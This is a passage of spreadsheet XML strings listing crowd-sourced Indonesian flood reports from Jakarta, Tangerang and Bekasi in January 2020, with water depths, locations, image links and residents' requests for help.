    <t>https://akcdn.detik.net.id/community/pasma/2020/01/02/1577955151585289612.jpg</t>
  </si>
  <si>
    <t>Banjir Setinggi 50 Cm Rendam Hasyim Ashari, Lalin Lumpuh</t>
  </si>
  <si>
    <t>Banjir dengan ketinggian 50-70 cm masih terjadi di Jalan KH Hasyim Ashari Ciledug, Tangerang. Lalu lintas pun lumpuh.</t>
  </si>
  <si>
    <t>Pedurenan</t>
  </si>
  <si>
    <t>Karang Tengah</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/347186</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/pasma/2020/01/02/157795576820510442.jpg</t>
  </si>
  <si>
    <t>Keceriaan Anak-anak Bermain Air Banjir di Ciledug Tangerang</t>
  </si>
  <si>
    <t>Banjir tak melulu membawa kabar duka, seperti sekelompok anak-anak ini yang justru riang gembira bermain air banjir di Ciledug Tangerang.</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/347187</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/pasma/2020/01/02/15779563682130681983.jpg</t>
  </si>
  <si>
    <t>Banjir di Cipondoh Jadi Ladang Rezeki Untuk Ojek Gerobak</t>
  </si>
  <si>
    <t>Ojek gerobak menjadi pilihan bagi pengendara motor yang ingin melintas tanpa khawatir motor mati kemasukan air banjir di ciledug. Tarifnya berkisar 30-50 ribu rupiah.</t>
  </si>
  <si>
    <t>89b610ef-76cb-406b-8a3f-b7f83a5b065d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/89b610ef-76cb-406b-8a3f-b7f83a5b065d.jpg</t>
  </si>
  <si>
    <t>{ "points": -1, "flood_depth": 40, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Banjir masi menggenang sampe sekarang di perumahan Kepa Duri Mas</t>
  </si>
  <si>
    <t>011498ae-3ef2-4bcf-a365-c3610ae40be3</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 90, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Banjir sepinggang orang dewasa &amp; listrik padam. Harap segera dipompa. Thanks</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/347190</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/data/media/thumbs-pasangmata/2020/01/02/347190-157795840859764954.mov-03.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1148", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir Surut, Tumpukan Sampah Menghiasi Kawasan Kebon Baru</t>
  </si>
  <si>
    <t>Banjir surut, warga di kawasan Kebon Baru, Tebet Jakarta Selatan membersihkan sampah-sampah akibat air kali Ciliwung yang meluap. Termasuk lumpur yang masuk ke rumah.</t>
  </si>
  <si>
    <t>952b4dc5-b981-491a-b79f-929bdaff9fbf</t>
  </si>
  <si>
    <t>Tidak ada perubahan ketinggian dari kemarin</t>
  </si>
  <si>
    <t>1725b95d-45e5-46f8-b6b9-e1d112bbc148</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 195 }</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "112", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir saat ini 3meter belum ada bantuan 1 orang anak remaja hilang tenggelam"</t>
  </si>
  <si>
    <t>2624f25c-1f16-4f3a-9cca-457824dfa68f</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 73 }</t>
  </si>
  <si>
    <t>Banjir dari tanggal 1 belum surut juga.</t>
  </si>
  <si>
    <t>56a58b0e-0044-4053-91a5-4b9a071d8c25</t>
  </si>
  <si>
    <t>https://images.petabencana.id/56a58b0e-0044-4053-91a5-4b9a071d8c25.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 125, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2608", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir sedada orang dewasa , lampu mati, no signal</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/347194</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/pasma/2020/01/02/1577959928112126147.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1465", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Awan Mendung Selimuti Kampung Melayu dan Sekitarnya</t>
  </si>
  <si>
    <t>Sore ini wilayah Bidara Cina, Kampung Melayu, Jakarta Timur mendung tebal, sepetinya akan turun hujan kembali. Selalu waspada agar mempersiapkan jika banjir tiba #banjir</t>
  </si>
  <si>
    <t>567b287a-c1ae-48ec-83a9-519ebb6d831f</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "214", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Pemukiman padat penduduk di taman kota rt. 016 rw.05 kembangan utara banjir seleher orang dewasa.  Mati lampu dan susah sinyal.</t>
  </si>
  <si>
    <t>85758a0f-d672-4c10-8f7c-5f01881a26cd</t>
  </si>
  <si>
    <t>https://images.petabencana.id/85758a0f-d672-4c10-8f7c-5f01881a26cd.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 77, "report_type": "flood" }</t>
  </si>
  <si>
    <t>sepinggang orang dewasa</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/347197</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/pasma/2020/01/02/1577960555401251486.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "2431", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Gara-gara Banjir, Lalin di Kampung Melayu Dialihkan</t>
  </si>
  <si>
    <t>Jalan dari Kampung Melayu yang biasanya melewati kampung Pulo dialihkan ke Jalan Jatinegara Timur karena adanya banjir. Bagi pengendara bisa mencari alternatif lainnya #banjir</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/347198</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/pasma/2020/01/02/1577961110304644298.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1692", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Penampakan Mobil yang Parkir di Jalan Akibat Banjir</t>
  </si>
  <si>
    <t>Penampakan jalan Kampung Pulo yang ditutup penuh dengan mobil yang terparkir di jalan akibat banjir didaerah tersebut #banjir</t>
  </si>
  <si>
    <t>Bali Mester</t>
  </si>
  <si>
    <t>428cba5a-dab2-4520-9d9a-412c05dccec1</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 71, "report_type": "flood" }</t>
  </si>
  <si>
    <t>ketinggian sekitar 70cm</t>
  </si>
  <si>
    <t>22094761-3f08-4e30-9a35-c4c44e4b485d</t>
  </si>
  <si>
    <t>banjir di bawah flyover</t>
  </si>
  <si>
    <t>Petir</t>
  </si>
  <si>
    <t>389f4244-7a9a-43c0-b7a8-d0bdbaf7d851</t>
  </si>
  <si>
    <t>{ "points": -2, "flood_depth": 96, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Banjir di Bumi Nasio Indah</t>
  </si>
  <si>
    <t>Jatimekar</t>
  </si>
  <si>
    <t>Jatiasih</t>
  </si>
  <si>
    <t>94b2fb47-027d-4469-9b92-1bdff3caf1d4</t>
  </si>
  <si>
    <t>https://images.petabencana.id/94b2fb47-027d-4469-9b92-1bdff3caf1d4.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 143 }</t>
  </si>
  <si>
    <t>f811bf10-270c-4a4e-a88a-fadc735675f9</t>
  </si>
  <si>
    <t>https://images.petabencana.id/f811bf10-270c-4a4e-a88a-fadc735675f9.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 105 }</t>
  </si>
  <si>
    <t>Tolong donk diperhatikan wilayah Jakarta Utara, Penjaringan sbb : 1. Teluk gong 2. Kapuk muara 3. Villa kapuk mas"</t>
  </si>
  <si>
    <t>d76c5014-f9b7-4bdb-8921-555f52c1a555</t>
  </si>
  <si>
    <t>https://images.petabencana.id/d76c5014-f9b7-4bdb-8921-555f52c1a555.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 69, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2609", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir di kapuk rusun, kl kapuk raya lbh tinggi sedada, tolong cpt surut krn byk orang tua dan balita</t>
  </si>
  <si>
    <t>5715a98e-b28f-450b-9f04-89803bf11357</t>
  </si>
  <si>
    <t>https://images.petabencana.id/5715a98e-b28f-450b-9f04-89803bf11357.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 98 }</t>
  </si>
  <si>
    <t>5494b81a-af29-4338-9253-3e0be8183aff</t>
  </si>
  <si>
    <t>{ "points": 0, "flood_depth": 65, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "2365", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Komplek Persada Sayang Rawa buaya masih kerendam banjir</t>
  </si>
  <si>
    <t>4331426a-9ddf-4893-aa8c-f5770b5256a8</t>
  </si>
  <si>
    <t>https://images.petabencana.id/4331426a-9ddf-4893-aa8c-f5770b5256a8.jpg</t>
  </si>
  <si>
    <t>Banjir sekitar 30-40 cm.</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/347209</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/pasma/2020/01/02/1577963499817245988.jpg</t>
  </si>
  <si>
    <t>Begini Situasi Terkini di Posko Banjir Ciledug Tangerang</t>
  </si>
  <si>
    <t>Situasi terkini di posko banjir Ciledug depan Perum Ciledug Indah 2. Agaknya warga tidak sabar menerima bantuan, sementara relawan mencoba menahan membagikan hingga semua tertib agar semua kebagian</t>
  </si>
  <si>
    <t>949ff96b-d0bc-4001-8821-94b6ae8689e2</t>
  </si>
  <si>
    <t>https://images.petabencana.id/949ff96b-d0bc-4001-8821-94b6ae8689e2.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 126 }</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2303", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir se dada orang dewasa</t>
  </si>
  <si>
    <t>4141ac23-625b-42d8-ad9a-d2c41e4ef0a3</t>
  </si>
  <si>
    <t>https://images.petabencana.id/4141ac23-625b-42d8-ad9a-d2c41e4ef0a3.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 74 }</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2506", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Ketinggian banjir hingga sebetis orang dewasa. Di jalan k, ketinggian banjir dari perut hingga dada orang dewasa.</t>
  </si>
  <si>
    <t>7fff5067-70f5-40f8-a34a-c2bcbd89d49a</t>
  </si>
  <si>
    <t>https://images.petabencana.id/7fff5067-70f5-40f8-a34a-c2bcbd89d49a.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 93 }</t>
  </si>
  <si>
    <t>banjir sudah masuk hari kedua</t>
  </si>
  <si>
    <t>0022fa22-390a-4f8f-95e9-4659414be2ed</t>
  </si>
  <si>
    <t>https://images.petabencana.id/0022fa22-390a-4f8f-95e9-4659414be2ed.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "37", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Jalan di sekitar limelight masih belum bisa dilewati</t>
  </si>
  <si>
    <t>a4fee1ad-5e6e-4191-bfb5-a3924b8e3405</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a4fee1ad-5e6e-4191-bfb5-a3924b8e3405.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "2390", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>ef05b524-2679-4c07-8d9a-e8c5ddfec490</t>
  </si>
  <si>
    <t>https://images.petabencana.id/ef05b524-2679-4c07-8d9a-e8c5ddfec490.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 127 }</t>
  </si>
  <si>
    <t>Kondisi hari ini di depan Alife Building</t>
  </si>
  <si>
    <t>873f8da3-78a4-4a55-9152-ddba4ad925c6</t>
  </si>
  <si>
    <t>https://images.petabencana.id/873f8da3-78a4-4a55-9152-ddba4ad925c6.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 35 }</t>
  </si>
  <si>
    <t>Help! Di sekitaran apartemen grand palm. Duri kosambi</t>
  </si>
  <si>
    <t>b52f7b15-237b-4a42-8d3b-6cec8e37b234</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b52f7b15-237b-4a42-8d3b-6cec8e37b234.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 56 }</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "2045", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Jika curah hujan cukup lebat, air yang menggenang di depan rumah akan masuk setinggi 20-40 cm. Hujan kemarin masuk ke rumah hingga 40 cm.</t>
  </si>
  <si>
    <t>Jati</t>
  </si>
  <si>
    <t>Pulo Gadung</t>
  </si>
  <si>
    <t>ed8f657a-4bdb-4696-8d7b-574a160feaf6</t>
  </si>
  <si>
    <t>https://images.petabencana.id/ed8f657a-4bdb-4696-8d7b-574a160feaf6.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 52 }</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "135", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir di Komp Green Ville Sudah sejak tgl 1 Januari 2020 dan belum surut, butuh perahu karet untuk evakuasi, belum ada bantuan sama sekali</t>
  </si>
  <si>
    <t>ac6a957a-4954-43f3-a73c-2768280dff49</t>
  </si>
  <si>
    <t>https://images.petabencana.id/ac6a957a-4954-43f3-a73c-2768280dff49.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 119 }</t>
  </si>
  <si>
    <t>Banjir di Greenville sudah 2 hari lebih dari 100cm tingginya di dalam kompleks, sangat butuh bantuan dan pompa agar cepat surut, segera</t>
  </si>
  <si>
    <t>bcdc695e-46e0-4f0e-9397-8dde569266b7</t>
  </si>
  <si>
    <t>https://images.petabencana.id/bcdc695e-46e0-4f0e-9397-8dde569266b7.jpg</t>
  </si>
  <si>
    <t>Banjir di Komp Perumahan Greenville sejak 1 Januari 2020 dan belum surut smp skrg , butuh perahu karet untuk evakuasi warga</t>
  </si>
  <si>
    <t>dbd1e781-cdae-4480-8db0-3aa5153317c5</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 82, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Fortune. Tidak bs dilewati</t>
  </si>
  <si>
    <t>3c434714-3532-4ffe-95cf-939dc3b816cc</t>
  </si>
  <si>
    <t>https://images.petabencana.id/3c434714-3532-4ffe-95cf-939dc3b816cc.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 67 }</t>
  </si>
  <si>
    <t>Tanjung Duren Utara masih terendam sejak kemarin (1 Jan) siang sampai hari ini (2 Jan) mohon bantuannya untuk penanganannya, terima kasih</t>
  </si>
  <si>
    <t>02902c96-f4e2-45ef-8d59-581bba6cc305</t>
  </si>
  <si>
    <t>https://images.petabencana.id/02902c96-f4e2-45ef-8d59-581bba6cc305.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "33", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Tanjung Duren Utara RT 10 RW 03 masih terendam air sudah lebih dari 36 jam tidak surut-surut, mohon dibantu penangannnya, terima kasih</t>
  </si>
  <si>
    <t>67667ee9-16b0-4541-96b2-a0b96d100a11</t>
  </si>
  <si>
    <t>https://images.petabencana.id/67667ee9-16b0-4541-96b2-a0b96d100a11.jpg</t>
  </si>
  <si>
    <t>{ "points": -1, "flood_depth": 64, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Banjir selutut</t>
  </si>
  <si>
    <t>f118e491-f807-431d-b255-0a4b144714b3</t>
  </si>
  <si>
    <t>https://images.petabencana.id/f118e491-f807-431d-b255-0a4b144714b3.jpg</t>
  </si>
  <si>
    <t>{ "points": 0, "flood_depth": 67, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Banjir jl mangga 1 duri kepa</t>
  </si>
  <si>
    <t>186cdf14-78c4-4be2-a931-da3a55e69801</t>
  </si>
  <si>
    <t>https://images.petabencana.id/186cdf14-78c4-4be2-a931-da3a55e69801.jpg</t>
  </si>
  <si>
    <t>{ "points": 0, "flood_depth": 63, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "2669", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Kapuk</t>
  </si>
  <si>
    <t>881d4ba5-f58d-48ee-ace8-decef10d1aec</t>
  </si>
  <si>
    <t>https://images.petabencana.id/881d4ba5-f58d-48ee-ace8-decef10d1aec.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 46, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "2358", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Depan gedung OT banjir sebetis orang dewasa sejak tgl 1 Jan dan sampai skrg belum surut</t>
  </si>
  <si>
    <t>e8b2a9c7-ca0d-4ef5-bf2c-b9f1e090410d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/e8b2a9c7-ca0d-4ef5-bf2c-b9f1e090410d.jpg</t>
  </si>
  <si>
    <t>{ "points": 3, "flood_depth": 146, "report_type": "flood" }</t>
  </si>
  <si>
    <t>JAKARTA BARAT  PERUMAHAN GREENVILLE TAHAP 4. TOLONG KIRIM BANTUAN SECEPATYA"</t>
  </si>
  <si>
    <t>8f4a864f-cef0-4139-8e42-c775f959fb24</t>
  </si>
  <si>
    <t>https://images.petabencana.id/8f4a864f-cef0-4139-8e42-c775f959fb24.jpg</t>
  </si>
  <si>
    <t>Mulai banjir sore ini sekitar jam 15.45 sampai malam ini jam 21.06 air meningkat dari kali Jl.Gadungan, Kec.Tarumajaya, Bekasi, Jawa Barat</t>
  </si>
  <si>
    <t>Pantaimakmur</t>
  </si>
  <si>
    <t>Tarumajaya</t>
  </si>
  <si>
    <t>cc54bcb6-f208-4b99-b8c1-1feabc30d141</t>
  </si>
  <si>
    <t>Komplek griya permata dan kampung di belakangnya</t>
  </si>
  <si>
    <t>34f50457-d8df-4b90-aba9-b85a8be042cf</t>
  </si>
  <si>
    <t>https://images.petabencana.id/34f50457-d8df-4b90-aba9-b85a8be042cf.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 45, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Kembangan utara</t>
  </si>
  <si>
    <t>1c795645-2ba6-4bbc-82ea-facc79d6915d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/1c795645-2ba6-4bbc-82ea-facc79d6915d.jpg</t>
  </si>
  <si>
    <t>Airnya dr tgl 1 sudah tinggi, kemudian seharian tidak surut sama sekali dan ditambah tgl 1 malam hujan lg, skrg jd lbh tinggi</t>
  </si>
  <si>
    <t>72cabb03-4593-491f-805c-9c3dbccb3e3f</t>
  </si>
  <si>
    <t>https://images.petabencana.id/72cabb03-4593-491f-805c-9c3dbccb3e3f.jpg</t>
  </si>
  <si>
    <t>{ "points": 2, "flood_depth": 123, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Banjir di komplek Bumi Satria Kencana.</t>
  </si>
  <si>
    <t>Kayuringin Jaya</t>
  </si>
  <si>
    <t>Bekasi Selatan</t>
  </si>
  <si>
    <t>aaa1c7d9-3c5b-4551-8cce-0530dcc991e1</t>
  </si>
  <si>
    <t>https://images.petabencana.id/aaa1c7d9-3c5b-4551-8cce-0530dcc991e1.jpg</t>
  </si>
  <si>
    <t>Jalan kapuk raya banjir dari tanggal 1 Januari pukul 06.00 ketinggian 40 - 60 cm</t>
  </si>
  <si>
    <t>7c93b5d0-f053-41ab-8bf8-c8977eae1b21</t>
  </si>
  <si>
    <t>https://images.petabencana.id/7c93b5d0-f053-41ab-8bf8-c8977eae1b21.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 87 }</t>
  </si>
  <si>
    <t>Banjir di carina sayang, bojong indah dan sekitarnya</t>
  </si>
  <si>
    <t>75a83b3f-ec18-410e-9673-4601ee0b56ac</t>
  </si>
  <si>
    <t>https://images.petabencana.id/75a83b3f-ec18-410e-9673-4601ee0b56ac.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 130 }</t>
  </si>
  <si>
    <t>Terendam banjir di daerah rawa buaya klingkit taruna sayang..sudah mencapai sedada orang dewasa</t>
  </si>
  <si>
    <t>f2b2b566-4c09-426e-8979-86067e7feb90</t>
  </si>
  <si>
    <t>https://images.petabencana.id/f2b2b566-4c09-426e-8979-86067e7feb90.jpg</t>
  </si>
  <si>
    <t>{ "points": 2, "flood_depth": 32, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "163", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Masih 30 cm</t>
  </si>
  <si>
    <t>48dd924f-8eae-4f06-9492-adcb7ef2be32</t>
  </si>
  <si>
    <t>https://images.petabencana.id/48dd924f-8eae-4f06-9492-adcb7ef2be32.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 40 }</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "26", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir di jelambar selatan belum surut, ketinggian air masih sama dengan kemarin</t>
  </si>
  <si>
    <t>58042b2f-520c-47ba-b9f5-941664fa4757</t>
  </si>
  <si>
    <t>https://images.petabencana.id/58042b2f-520c-47ba-b9f5-941664fa4757.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 83 }</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "22", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>2432bb40-d530-42a7-b0a5-84568b4b5d4c</t>
  </si>
  <si>
    <t>https://images.petabencana.id/2432bb40-d530-42a7-b0a5-84568b4b5d4c.jpg</t>
  </si>
  <si>
    <t>{ "points": 2, "flood_depth": 180, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Menurut info, tadi siang ada tim SAR perahu karet yangsudah datang. Logistik belum semua nya mendapatkan. Banyak balita dan lansia yg sakit.</t>
  </si>
  <si>
    <t>Sriamur</t>
  </si>
  <si>
    <t>68ede1fe-feab-4c2c-8340-6f3e4459da5a</t>
  </si>
  <si>
    <t>Banjir bgt sepanjang jembatan</t>
  </si>
  <si>
    <t>Mustika Jaya</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/347107</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/data/media/thumbs-pasangmata/2020/01/02/347107-1577924802211202808.mp4-03.jpg</t>
  </si>
  <si>
    <t>Pagi ini Bendungan Katulampa Sudah Mulai Normal</t>
  </si>
  <si>
    <t>Pagi ini kondisi air di bendungan katulampa sudah mulai normal. debit air sudah menurun dari sejak semalam hingga pagi ini.</t>
  </si>
  <si>
    <t>Katulampa</t>
  </si>
  <si>
    <t>Bogor Timur</t>
  </si>
  <si>
    <t>b3cf79e3-49cc-48df-b915-b73f9727dc9c</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b3cf79e3-49cc-48df-b915-b73f9727dc9c.jpg</t>
  </si>
  <si>
    <t>{ "points": 2, "flood_depth": 106, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Banjir tidak kunjung surut perumnas 1 bekasi barat,,, banjir naik terus sedada orang dewasa mohon bantuannya,,,,</t>
  </si>
  <si>
    <t>d02a2a5d-5b7a-4d9e-985f-457292493455</t>
  </si>
  <si>
    <t>{ "points": 2, "flood_depth": 43, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "574", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Tinggi genangan 45cm</t>
  </si>
  <si>
    <t>95ca9bf8-c641-4039-a406-1ad6b5fbe797</t>
  </si>
  <si>
    <t>https://images.petabencana.id/95ca9bf8-c641-4039-a406-1ad6b5fbe797.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 89 }</t>
  </si>
  <si>
    <t>Banjir sejak kemarin pagi &amp; listrik padam sejak kemarin siang.</t>
  </si>
  <si>
    <t>771aca93-7f96-4bed-9e8b-07f98732754b</t>
  </si>
  <si>
    <t>https://images.petabencana.id/771aca93-7f96-4bed-9e8b-07f98732754b.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 32 }</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "1639", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Ketinggian banjir sudah surut,per tgl 02 januari 2020 jam 08.19 ketinggian air sebetis orang dewasa +- 30cm</t>
  </si>
  <si>
    <t>Kelapa Gading Timur</t>
  </si>
  <si>
    <t>Kelapa Gading</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/347112</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/data/media/thumbs-pasangmata/2020/01/02/347112-15779276091259711924.mp4-03.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1642", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Pinggir Rel Stasiun Bekasi Banjir, ini yang Dilakukan Warga</t>
  </si>
  <si>
    <t>Banjir merendam rumah hampir setinggi pintu rumah, banyak warga yang ang mengamankan barang barangnya di pinggir rel kereta api dan banyak yang lagi mancing ikan, lokasi sebelum stasiun kereta Bekasi, Jawa barat,</t>
  </si>
  <si>
    <t>Cipinang Besar Utara</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/347120</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/pasma/2020/01/02/157792872462920437.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1769", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Genangan Air Sisa-sisa Banjir Masih Tersisa di MT Haryono</t>
  </si>
  <si>
    <t>Ada genangan air di jalan MT. Haryono, Cawang, Jakarta Timur, bagi pengendara motor harap berhati-hati, belum ada petugas yang melakukan penyedotan air #banjir</t>
  </si>
  <si>
    <t>Cipinang Cempedak</t>
  </si>
  <si>
    <t>1dbcfcde-03fc-484b-ad45-85911fe51dae</t>
  </si>
  <si>
    <t>https://images.petabencana.id/1dbcfcde-03fc-484b-ad45-85911fe51dae.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 120, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Kondisi saat ini banjir sudah sedada orang dewasa. Kondisi di foto diambil 1 Jan 2020 pukul 3 sore sebelum hujan lebat jam 8 malam.</t>
  </si>
  <si>
    <t>6786ad27-b027-4f30-aa75-3e296ba98091</t>
  </si>
  <si>
    <t>https://images.petabencana.id/6786ad27-b027-4f30-aa75-3e296ba98091.jpg</t>
  </si>
  <si>
    <t>Di jln K telukgong</t>
  </si>
  <si>
    <t>12ff94b3-f1ed-4e74-aac1-92a9f99c86b6</t>
  </si>
  <si>
    <t>{ "points": 2, "flood_depth": 40, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2190", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Posisi didepan pom bensin blvd barat</t>
  </si>
  <si>
    <t>Kelapa Gading Barat</t>
  </si>
  <si>
    <t>fb58d75c-6589-49a3-84fc-e1a918bd9c41</t>
  </si>
  <si>
    <t>https://images.petabencana.id/fb58d75c-6589-49a3-84fc-e1a918bd9c41.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 38, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Perumahan Nuri Bintaro</t>
  </si>
  <si>
    <t>Pondok Ranji</t>
  </si>
  <si>
    <t>Ciputat Timur</t>
  </si>
  <si>
    <t>9550250a-eac7-4566-acea-89bcdc419514</t>
  </si>
  <si>
    <t>https://images.petabencana.id/9550250a-eac7-4566-acea-89bcdc419514.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 46 }</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "951", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Pintu masuk Semanan.</t>
  </si>
  <si>
    <t>d10383d4-ecb1-4998-a763-6d7b2685a4cc</t>
  </si>
  <si>
    <t>https://images.petabencana.id/d10383d4-ecb1-4998-a763-6d7b2685a4cc.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 34, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Depan gedung OT</t>
  </si>
  <si>
    <t>bccef940-5426-4d3b-a691-4a6bdaecc2e9</t>
  </si>
  <si>
    <t>https://images.petabencana.id/bccef940-5426-4d3b-a691-4a6bdaecc2e9.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 44, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Samping tol JORR Semanan</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/347130</t>
  </si>
  <si>
